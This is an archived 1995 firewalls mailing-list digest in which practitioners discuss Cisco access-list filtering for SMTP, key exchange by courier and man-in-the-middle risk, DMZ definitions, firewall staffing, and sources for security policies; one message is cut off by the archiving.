It occurs to me that you may simply need to change your "out" to an "in", as I think you've got your logic reversed.

-------------------------------------------------------------------------
Paul Crossley (paul@toploguk.co.uk)        Senior Consultant  SCO ACE
TopLog Limited
TopLog House, Knaves Beech Business Centre, Loudwater, Bucks. HP10 9QY
Phone (01628) 819444   Fax (01628) 819356
-------------------------------------------------------------------------

From firewalls-owner Thu Oct 5 04:52:46 1995
Date: Thu, 5 Oct 1995 12:44:58 +0100
From: Petter Häggman
Message-Id: <199510051144.AA01670@tintin.lule.frontec.se>
To: firewalls@GreatCircle.COM
Subject: Re: cisco router extended access-list question

ilias.liakopoulos@telecom.at wrote:
>
> Hello,
>
> I have set up an access-list like the example in
> UnileverCD
> for allowing only SMTP connections (the IP addrs are invented):
>
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25
>
> SMTP works but with this config I tried telnet and it also works .
> this is not acceptable and if I remove the established line ->
> nothing works.
> the interface config:
>
> interface Ethernet0
> ip address 2.2.3.2 'some adr mask'
> ip access-group 102 out
>
> have I done something wrong in the config or is this a bug
> in our version? :
> [snip]

You can use access lists on both incoming and outgoing packets, and if what you want to accomplish is SMTP connections to and from your host, this should work:

interface Ethernet0
 ip address 2.2.3.2 'some adr mask'
 ip access-group 101 in
 ip access-group 102 out

! Allow SMTP connections from all to "my_host"
access-list 101 permit tcp 0.0.0.0 255.255.255.255 "my_host" 0.0.0.0 eq 25
! Allow connections from all to "my_host" that's established
access-list 101 permit tcp 0.0.0.0 255.255.255.255 "my_host" 0.0.0.0 established
! Allow "my_host" to connect to all on port SMTP
access-list 102 permit tcp "my_host" 0.0.0.0 0.0.0.0 255.255.255.255 eq 25
! Must allow tcp established on outgoing packets to make connection possible
access-list 102 permit tcp "my_host" 0.0.0.0 0.0.0.0 255.255.255.255 established

This should allow only SMTP connections in and out. Note that this is not the only way to do this, and one can apply small changes that totally change the filtering function. (For example, consider 'gt 1023' instead of 'established' on the second line of access list 102, which would allow your host to use any service on all hosts that resides on ports above 1023!)
Also note that when using filters both on incoming and outgoing packets, one has to read both filters at the same time to see the functionality, but that's what's fun about access-lists...;-) Hope this'll help you on the way..:-) /Petter -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Petter Haggman Email: Petter.Haggman@lule.frontec.se Arctic Software AB Phone: +46 920 75116 , Fax: +46 920 75199 Aurorum 1, S-977 75 Lulea, Sweden NMT: 010 - 259 42 77 From firewalls-owner Thu Oct 5 06:22:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23065 for firewalls-outgoing; Thu, 5 Oct 1995 06:11:05 -0700 Received: from scifi.maid.com (scifi.emi.net [204.181.45.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA23056 for ; Thu, 5 Oct 1995 06:10:57 -0700 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id JAA30854; Thu, 5 Oct 1995 09:07:48 -0400 Date: Thu, 5 Oct 1995 09:07:48 -29900 From: Nick Simicich Subject: Re: Encryption strength To: Brett Lymn cc: firewalls@GreatCircle.COM In-Reply-To: <9510050230.AA10917@bunya.awadi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Oct 1995, Brett Lymn wrote: > According to Nick Simicich: > > > >The new version of IBM's firewall provides this function. To set up a > >secure channel, you describe the channel, and it cuts a diskette, which > >you fedex to the other party. > > > > How .... ummmmm..... trusting of you. I suppose it really depends on > the level of security you are looking for but you did consider that > the fedex package may get intercepted? Delivered to the incorrect > person (say, the janitor)? I knew as soon as I sent this that I was courting trouble from two points: 1. People would assume that I was advertising Fedex as a secure channel. I wasn't. I was advertising it as a 'different', non-network channel. 2. 
People would assume that I was somehow endorsing Federal Express. Generally, IBM's deal is with Airbourne :-). Hmmm...at some point, you have to trust someone. Is fedex (generic term for overnight courier, like asprin for ASA :-) [now I expect a letter from Federal Express - please remember that I'm speaking for myself] a secure channel? No, but if you are that paranoid and your data is that valuable, you carry the key there yourself. I knew that I should have said, "You pick a courier that you can trust, depending on your level of paranoia - anyone from Fedex to your company CEO making a special trip depending on your level of trust and the value of your data" but I shortcut it. No, Fedex is not a secure channel - but a network cracker is unlikely to intercept it, I suspect. They may have other worldviews. My point was that the original key exchange was not by IP on a clear channel. You could also make an image of the diskette and transfer it by secure encrypted modem connection, or you could uuencode the config files, transcribe them to onionskin paper, send them by carrier pigeon, and OCR them at the other end. Or you could FTP the unencrypted diskette image on an open network and hope that no one would intercept it. You pick the method depending on your paranoia and the value of your data. Even if you hired a Brinks armored car to make a special trip with armed guards and couriers, how do you know that they haven't been subverted such that there is a laptop on the armored car to make a copy in transit? You don't. Do you have time and the money to make an overseas trip to courier a diskette? I believe that a cracker is significantly more likely to take the network approach of breaking the end system and getting the keys once the secure channel is set up. 
If they are so intent on breaking you that they are intercepting your Fedex, you also have to worry about dumpster diving, people subverting employees, people kidnapping employees and stealing their ID to gain physical access to the building, armed attack and so forth. > Exchanging encryption keys is always a thorny problem since the key > _is_ your data security - if it is subverted then your encryption is > useless. Absolutely, and I didn't mean to make light of it. I did, though, and people made some good points. > -- > Brett Lymn, Computer Systems Administrator, AWA Defence Industries Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Thu Oct 5 06:53:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23331 for firewalls-outgoing; Thu, 5 Oct 1995 06:43:36 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA23324 for ; Thu, 5 Oct 1995 06:43:30 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 5 Oct 1995 14:41:57 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3073E6D8@smtpgty.saicuk.co.uk>; Thu, 05 Oct 95 14:08:24 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Re: Encryption strength Date: Thu, 05 Oct 95 13:48:00 GMT Message-ID: <3073E6D8@smtpgty.saicuk.co.uk> Encoding: 41 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Similar solution is one option with the Armadillo products which are also B1+ COTS products. However, the selection of a particular transit system is subject to your level of paranoia. I was involved in a system where the customer engaged an armed escort to convey the product from production to their embassy. 
From there it travelled under escort as a diplomatic bag transfer, and then under armed escort to the user site. Key changing is done by special messengers travelling between embassies. Thats a bit OTT for most people and either reflected the paranoia of the customer or the fact that an ending of East West tension has created a large number of redundant or potentially redundant armed guards. Ian J-B ---------- From: firewalls-owner Cc: firewalls Subject: Re: Encryption strength Date: Wednesday, October 04, 1995 8:08PM On Wed, 4 Oct 1995, David Miller wrote: > On Tue, 3 Oct 1995, Frank Willoughby wrote: > > > >From padgett's excellent mail: > But this is the crux of the chicken-and-egg problem. How do they > mutually authenticate each other? If they do it with a shared secret or > through prior arrangement a secure channel had to previously exist. If > there is no third pary/shared secret then it's subject to a > man-in-the-middle attack. The new version of IBM's firewall provides this function. To set up a secure channel, you describe the channel, and it cuts a diskette, which you fedex to the other party. > Now if *thats* been solved, I'd be *delighted* to hear about it! I thought that was what the public key distribution stuff was all about. Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! 
From firewalls-owner Thu Oct 5 07:02:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23288 for firewalls-outgoing; Thu, 5 Oct 1995 06:40:42 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA23269 for ; Thu, 5 Oct 1995 06:40:35 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id JAA01114; Thu, 5 Oct 1995 09:33:06 -0400 Date: Thu, 5 Oct 1995 09:33:05 -0400 (EDT) From: David Miller Subject: Re: Encryption strength To: Nick Simicich cc: firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Oct 1995, Nick Simicich wrote: > On Wed, 4 Oct 1995, David Miller wrote: > > > On Tue, 3 Oct 1995, Frank Willoughby wrote: > > > > > >From padgett's excellent mail: > > > But this is the crux of the chicken-and-egg problem. How do they > > mutually authenticate each other? If they do it with a shared secret or > > through prior arrangement a secure channel had to previously exist. If > > there is no third pary/shared secret then it's subject to a > > man-in-the-middle attack. > > The new version of IBM's firewall provides this function. To set up a > secure channel, you describe the channel, and it cuts a diskette, which > you fedex to the other party. Wouldn't you have to describe fedex as an additional channel, one which you are assuming is secure? > > Now if *thats* been solved, I'd be *delighted* to hear about it! > > I thought that was what the public key distribution stuff was all about. The public key solves part of the problem. Unfortunately it's subject to the man-in-the-middle (MITM) attack. 
How do *you* know that the public key you hold for me is indeed *mine*, and not that of slimey_sam, who will decrypt your secret message to me, encode it with my *real* public key, and ship along to me (along with *his* public key which I then think is *yours*)???? I agree completely that the odds of this are truly remote. Particularly for things like mailing love triangle stories via PGP. But I'd like to see a mathematical solution to the problem so that I know there's no chance whatsoever that my telnet session to my branch in France isn't being listened to by the french authorities. --- David Miller ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Thu Oct 5 07:19:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23315 for firewalls-outgoing; Thu, 5 Oct 1995 06:43:06 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA23307 for ; Thu, 5 Oct 1995 06:42:59 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 5 Oct 1995 14:41:08 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3073E6AA@smtpgty.saicuk.co.uk>; Thu, 05 Oct 95 14:07:38 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Re: DMZ definition ? Date: Thu, 05 Oct 95 12:48:00 GMT Message-ID: <3073E6AA@smtpgty.saicuk.co.uk> Encoding: 104 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is also used sometimes to describe 'air-gapped' solutions where there is no physical link between the public and untrusted gateway and the sensitive/classified private networks. 
In that situation, the traffic is taken onto transfer disks which are usually then examined by the security officer on a machine which serves as a sanitation area, before being loaded to the machine which gateways to one environment only. That obviously introduces delays which can be considerable and costly. The updated version of that approach is performed on Armadillo Gargoyle systems on a single Trusted Gateway server between the two networks which permits automated transfer using personal security profiles and only requires manual intervention if a user wants to transact outside his/her profile limits. That system is in use by civil and military departments of several governments where classified and unclassified data is involved. Where manual intervention is required, the security officer performs this on the same system and authorised transfers execute electronically within the machine rather than requiring disks to be used physically between two sets of unconnected machines. This has the virtue of applying high security with good levels of access at an affordable cost, is easily re-configured and can have the automated transfer shut down any time by the security officer if the situation demands it. It is flexible in that it can handle exceptions faster than an air-gapped system. Ian J-B. ---------- From: firewalls-owner To: dasidwel Cc: firewalls Subject: Re: DMZ definition ? Date: Wednesday, October 04, 1995 10:30PM The term DMZ grew out of the border area between north and south korea (or was it vietnam, I wasn't alive for either...) We could argue all day about which of the following more exactly fit the definition of a DMZ, but that's what college professors are for :) IMHO a DMZ is any network which sits between two other networks, which, for whatever reason, have a problem with each other. ] Can anyone give me a concise defition of the term Demilitarized Zone, or DMZ See above. ] for short, in connection with firewall terminology ? 
I am under the belief,
] perhaps incorrectly, that it is used to refer to any kind of screened subnet
] placed between the internal networks and the Internet (or other external
] networks).

Agreed.

] A colleague of mine is convinced that it is a separate subnet hung
] off a single firewall machine.

That's kind of fuzzy, though it could be constructed that this 'logical' network is between the two other networks.

] 1.
]            [ packet  ]                  [ packet  ]
] Internet---[filtering]----DMZ subnet----[filtering]---internal
]            [ router  ]    (containing   [ router  ]   networks

Yep.

] 2. As above but protected by firewalls instead of packet filtering routers.

Yep.

] 3.
] Internet----firewall----internal networks...
]                 |
]                 |
]                DMZ
]               subnet

3 == 1 logically. One could implement a system w/ 3 that did the same thing.

] Finally, does a DMZ implementation always prevent direct IP forwarding from
] Internet to internal nets ?

Nope. For whatever reason, network 1) above could allow telnets from the far left to the far right, and I'd have no problem with it, and would call it a DMZ. (Actually, I would have a problem allowing telnets directly into my network, but I'd still whore myself out to the customer if their security policy allowed it. This is where me and the 'experts' part company.)

--
Alan Hannan                    Email: alan@mid.net
Network Systems/Security       Voice: (402) 472-0239
MIDnet, Lincoln NOC Office     Fax:   (402) 472-0240

" The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man.
" - George Bernard Shaw From firewalls-owner Thu Oct 5 07:24:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23322 for firewalls-outgoing; Thu, 5 Oct 1995 06:43:11 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA23313 for ; Thu, 5 Oct 1995 06:43:04 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 5 Oct 1995 14:41:32 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3073E6C2@smtpgty.saicuk.co.uk>; Thu, 05 Oct 95 14:08:02 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: RE: What's the admin effort Date: Thu, 05 Oct 95 13:40:00 GMT Message-ID: <3073E6C2@smtpgty.saicuk.co.uk> Encoding: 99 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With respect thats a 'piece of string' question because there are so many variables, including: If you have a 'roll-your-own' firewall, as many do, you may have a considerable support overhead which should not be present in a Commercial Off The Shelf, COTS product. Whether the firewall is home brewed or COTS, it could come in any one of a wide range of configurations and that range is constantly growing as different users show different needs and the market for specialised systems grows. For example, some users want a barrier but only want to permit mail to pass, while others want to permit rich access to all facilities. For many, a firewall is a system for Internet access. However, there are other Information Super Highway environments and they may grow in number. That could increase management overheads because requirements could be very different for each ISH, even if you operate everything through a single machine. Most implemented firewalls are single machines but this should be regarded as a mission critical service for most users. 
How you handle resilience will have management overhead implications. Many users may have a single firewall gateway to ISH, but an increasing number of users are implementing firewalls at several different locations and management overhead will vary according to how you intend to manage these different sites. Overhead for a single level, system high, security policy will be different from a multi-level secure system. Perhaps the biggest variable will be traffic types and levels. If you only have a handful of emails passing each way, each day, the management requirement will be very different from that on a system where a wide range of activities are catered for, there are thousands of users, and Gbs of data passing 24X7. Although someone else may claim different, IMHO there is no linear graph which works because there are so many potential variables. Also there is the highly contentious issue of engineers 'playing'. There are subscribers to this list who clearly grew up with Internet firewalls and may have known a great deal about UNIX (or some other OS), but nothing about risk management/security, at least in the beginning. Over time they have acquired risk management knowledge, but often against a background of where they started from. At the other extreme, there are folk who are risk/security specialists from one or more environments. That provides a range of views and each of us must believe that our view is right, or nearly right. The UNIX background people are used to an environment where they start off with source code. The MS background folk generally believe the gospel according to Uncle Bill, etc. If your system is to be run by UNIX people, you may already be biased to home brew firewalls and the need for source code. That will probably result in maximum time spent on 'system management' but much of that time may be totally unnecessary. 
These are only a few variables, and responses to your posting will probably list a great many more, some of which may apply to your situation and some which won't.

The most important factor is how you approached risk management. I really do not believe that a firewall can be treated on its own, any more than any other risk reduction service. You have to start with a real risk policy. That policy may determine that only a small % of employees need ISH access and it may be possible to restructure the private networks to reduce load on, or even remove the need for, a firewall. Do remember that many of us may have a vested interest, like trying to sell you a firewall, and the bad news about risk policies for product vendors is that sometimes they show there is no need to buy product, or that a very different type of product would best suit your specific needs.

It should also establish what levels of control you should apply, and who should be managing security, and at what level. For example, a great many firewall owners simply add the security duties for the firewall to the sysad. In a structured risk management environment, you should have a security management team who are responsible for risk management through the enterprise, including information systems and gateways. How big that team is, and what % is firewall related, will depend on all the sizing factors and operational requirements. Then again, you could do what so many have done before and say that the firewall will take X% of the existing staffing time in the MIS department and hope you are right. If you are wrong then maybe you can smuggle additional headcount through later on, but then again you could end up with a bigger problem than you started out with.

Ian J-B

----------
From: firewalls-owner
To: Firewalls
Subject: What's the admin effort
Date: Thursday, October 05, 1995 5:55PM

We're considering the business case for a firewall product at the moment.
I've been asked how much of a persons' (or multiple people) time would be taken up in day to day operational control of a firewall, in terms of monitoring the activity, and change management. Is there any sort of benchmarking of this activity that people are aware of, I'd be interested in any statistics or experience have had. Peter Cooper From firewalls-owner Thu Oct 5 07:31:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA24071 for firewalls-outgoing; Thu, 5 Oct 1995 07:13:55 -0700 Received: from mailhost.lanl.gov (mailhost.lanl.gov [128.165.3.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA24064 for ; Thu, 5 Oct 1995 07:13:52 -0700 Received: from xdiv.lanl.gov by mailhost.lanl.gov (8.6.12/1.2) id IAA20603; Thu, 5 Oct 1995 08:12:28 -0600 Received: from xdiv.lanl.gov (arno.lanl.gov [128.165.116.121]) by xdiv.lanl.gov (8.6.12/8.6.12) with SMTP id IAA20849 for ; Thu, 5 Oct 1995 08:12:38 -0600 Date: Thu, 5 Oct 1995 08:12:38 -0600 From: Parks Fields Message-Id: <199510051412.IAA20849@xdiv.lanl.gov> To: firewalls@greatcircle.com Subject: Security policy ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello world, I know the basic of security is a good security policy. I have created a security policy but I am not 100% happy with it. Could some of you send me a copy of yours so I can figure out what mine is missing? Thank you. 
**************************************************************************** Parks Fields MS B218 Internet: parks@lanl.gov Los Alamos National Laboratory Phone: (505) 667-6872 Los Alamos, NM 87545 **************************************************************************** From firewalls-owner Thu Oct 5 07:58:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA24055 for firewalls-outgoing; Thu, 5 Oct 1995 07:12:10 -0700 Received: from margit.scri.fsu.edu (margit.scri.fsu.edu [144.174.128.45]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA24047 for ; Thu, 5 Oct 1995 07:12:05 -0700 Received: by margit.scri.fsu.edu (AIX 3.2/UCB 5.64/4.03) id AA12389; Thu, 5 Oct 1995 10:10:35 -0400 Date: Thu, 5 Oct 1995 10:10:35 -0400 From: hays@margit.scri.fsu.edu (Ken Hays) Message-Id: <9510051410.AA12389@margit.scri.fsu.edu> To: dasidwel@us.oracle.com Cc: firewalls@GreatCircle.COM In-Reply-To: <9510042317.AA28157@mailsun2.us.oracle.com> Subject: DMZ definition ? Reply-To: Ken Hays Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David, In one of the views of the Internet architecture, the term DMZ is used to describe the media layer (Ethernet/FDDI/...) where route peering is done among multiple administrative regions that have their own policies for routing and transit traffic. This usage is not dependant on the routing protocols used, although BGP is the current favorite for peering between autonomous systems. I believe this to be a valid use of the term DMZ, of course this usage is wrt route peering and independent of whether there is any packet level filtering implemented. This usage might be viewed as #0 in your list below since it is the least disruptive of "wide open any to any" connectivity. In this case, it does not block "direct" access of packets from the internal nets to the rest of the world. This usage may be not be to the taste of some but has existed for many years. 
Of course, the routers doing the route peering are prime candidates for implementing any "network router level" packet filters that you desire, as depicted in your #1 below. An example would be blocking all the r* services from the "outer" regions.

Later,
Ken

--------------- Prompting Message Fragment Follows ---------------

"David Sidwell" wrote on 04-Oct-95 at 16:09:49 -0700, in part:
>
>
>Can anyone give me a concise definition of the term Demilitarized Zone, or DMZ
>for short, in connection with firewall terminology ? I am under the belief,
>perhaps incorrectly, that it is used to refer to any kind of screened subnet
>placed between the internal networks and the Internet (or other external
>networks). A colleague of mine is convinced that it is a separate subnet hung
>off a single firewall machine.
>
>So would the following be correctly termed DMZ's or not ?
>
>1.
>            [ packet  ]                  [ packet  ]
> Internet---[filtering]----DMZ subnet----[filtering]---internal
>            [ router  ]    (containing   [ router  ]   networks
>                           publicly
>                           accessible
>                           machines)
>
>2. As above but protected by firewalls instead of packet filtering routers.
>
>
>3.
> Internet----firewall----internal networks...
>                 |
>                 |
>                DMZ
>               subnet
>
>
>Finally, does a DMZ implementation always prevent direct IP forwarding from
>Internet to internal nets ?
>
> TIA,
> David Sidwell
>
>

From firewalls-owner Thu Oct 5 08:25:54 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25275 for firewalls-outgoing; Thu, 5 Oct 1995 08:00:02 -0700
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA25256 for ; Thu, 5 Oct 1995 07:59:57 -0700
Received: from gmap-gw.leeds.ac.uk by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id HAA12734; Thu, 5 Oct 1995 07:51:26 -0700
Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id PAA00764 for ; Thu, 5 Oct 1995 15:31:17 +0100
Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id PAA02807 for ; Thu, 5 Oct 1995 15:52:59 +0100
From: Danny Cox
Date: Thu, 5 Oct 1995 15:47:39 +0100
Message-Id: <642.9510051447@gmap.leeds.ac.uk>
X-Planation: X-Faces images can be viewed with the XFaces program
To: firewalls@greatcircle.com
Subject: Firewalls ISDN and modems
X-Sun-Charset: US-ASCII
X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Thu, 5 Oct 1995 08:43:08 -0700
Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id LAA14491 for ; Thu, 5 Oct 1995 11:41:13 -0400
Date: Thu, 5 Oct 1995 11:41:13 -0400
Message-Id: <199510051541.LAA14491@psyche.the-wire.com>
X-Sender: anton@the-wire.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: Anton J Aylward
Subject: Re: Web Browser Test -- WHAT!!!!
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The issue isn't whether I can or cannot telnet to a port and read the HTML the 'hard' way. The issue is the format and style of the posting. Go back and read the original. The issue is the philosophy, not the technology or the implementation.
It's in the same class, IMHO, as the "Send a postcard to Craig" postings. There's always someone who doesn't know, some poor sucker who gets caught. Perhaps I'm sufficiently a social creature to try and prevent the innocent and immature from the consequences of their own folly ;-)

Yes, the actual document explains what it is about, but the author could equally well have said something to that effect in the posting. Why didn't he? Would someone inviting you to a trap have formatted the message in a similar way?

Acks and Kudos to those who mailed me saying their reaction to such things is simply to delete them as junk mail for much the reasons I outlined. Just because something IS technically possible doesn't mean that we have to waste the time, money and manpower flutzing around with it.

'Nuff said, end of discussion, end of thread.

/anton - from a nice quiet neighbourhood in paranoia city

--
Anton J Aylward                     The Strahn and Strachan Group Inc
Information Security Consultants    Voice: (416) 494-8661  Fax: (416) 494-8803

From firewalls-owner Thu Oct 5 09:44:29 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26238 for firewalls-outgoing; Thu, 5 Oct 1995 08:39:33 -0700
Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26231 for ; Thu, 5 Oct 1995 08:39:29 -0700
Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124655.0.12137; Thu, 05 Oct 1995 10:38:13 -0500
From: RTATE@folio.com (RTATEfolio.com)
To: cmilam@cap.au.af.mil, firewalls@greatcircle.com (firewalls)
Message-ID: <1995Oct04.124655.0.12137@cap.au.af.mil>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Civil Air Patrol National Headquarters
Date: Thu, 05 Oct 1995 10:38:13 -0500
Subject: Borderware vs.
Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124234.0.8747; Wed, 04 Oct 1995 12:42:35 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjxm10004; Tue, 3 Oct 1995 19:43:45 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28611 for firewalls-outgoing; Tue, 3 Oct 1995 16:05:44 -0700 Received: from folio.com (smtpgate.folio.com [198.60.24.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28604 for ; Tue, 3 Oct 1995 16:05:41 -0700 From: RTATE@folio.com Received: from FOLIO_PRIMARY_DOMAIN-Message_Server by folio.com with WordPerfect_Office; Tue, 03 Oct 1995 17:07:44 -0600 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Tue, 03 Oct 1995 17:05:45 -0600 To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Thu Oct 5 09:52:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA29177 for firewalls-outgoing; Thu, 5 Oct 1995 09:49:58 -0700 Received: from inms-db.os.dhhs.gov (inms-db.os.dhhs.gov [158.70.254.28]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA29164 for ; Thu, 5 Oct 1995 09:49:52 -0700 Received: by inms-db.os.dhhs.gov (4.1/2.9-eef) id AA07041; Thu, 5 Oct 95 12:42:53 EDT Date: Thu, 5 Oct 1995 12:42:53 -0400 (EDT) From: Alan Dowd To: Parks Fields Cc: firewalls@greatcircle.com Subject: Re: Security policy ? 
In-Reply-To: <199510051412.IAA20849@xdiv.lanl.gov>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings, Parks!

On Thu, 5 Oct 1995, Parks Fields wrote:

> Hello world,
>
> I know the basic of security is a good security policy. I have created a
> security policy but I am not 100% happy with it. Could some of you
> send me a copy of yours so I can figure out what mine is missing?
>
> Thank you.
>
> ****************************************************************************
> Parks Fields
> MS B218                            Internet: parks@lanl.gov
> Los Alamos National Laboratory     Phone: (505) 667-6872
> Los Alamos, NM 87545
> ****************************************************************************

Start out with RFC1244: Site Security Handbook. You can obtain it from http://csrc.ncsl.nist.gov/secpolcy - the document is the last one on the page: rfc1244.txt.

There are more security sites and sources of policy on the net than it is reasonable to list in a single reply. However, here are three good starting points for general security information:

NIST Computer Security Resource Center (CSRC)     http://csrc.ncsl.nist.gov
TELSTRA                                           http://www.telstra.com.au/security.html
DoE Computer Incident Advisory Center (CIAC)      http://ciac.llnl.gov/ciac/CIACHome.html

Somewhere or another I tripped upon an archive of security policies from educational institutions, but I could not locate it on a real fast search for this reply. Perhaps, with the knowledge that it exists, you can find it with a bit of Web-walking.

Regards,
Al Dowd
Unix Network Security
Management Systems Applications, Inc.
From firewalls-owner Thu Oct 5 10:00:15 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26400 for firewalls-outgoing; Thu, 5 Oct 1995 08:43:50 -0700
Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26381 for ; Thu, 5 Oct 1995 08:43:27 -0700
Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.12200; Thu, 05 Oct 1995 10:42:29 -0500
From: peter@nmti.com (Peter da Silva)
To: cmilam@cap.au.af.mil, sgcccdc@citec.qld.gov.au (Colin Campbell)
Cc: wbunting@ch.inri.com (wbunting), firewalls@GreatCircle.COM (firewalls)
Message-ID: <1995Oct05.071240.0.12200@cap.au.af.mil>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Civil Air Patrol National Headquarters
Date: Thu, 05 Oct 1995 10:42:29 -0500
Subject: Re: FW to FW FTP w/ no port > 1023
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
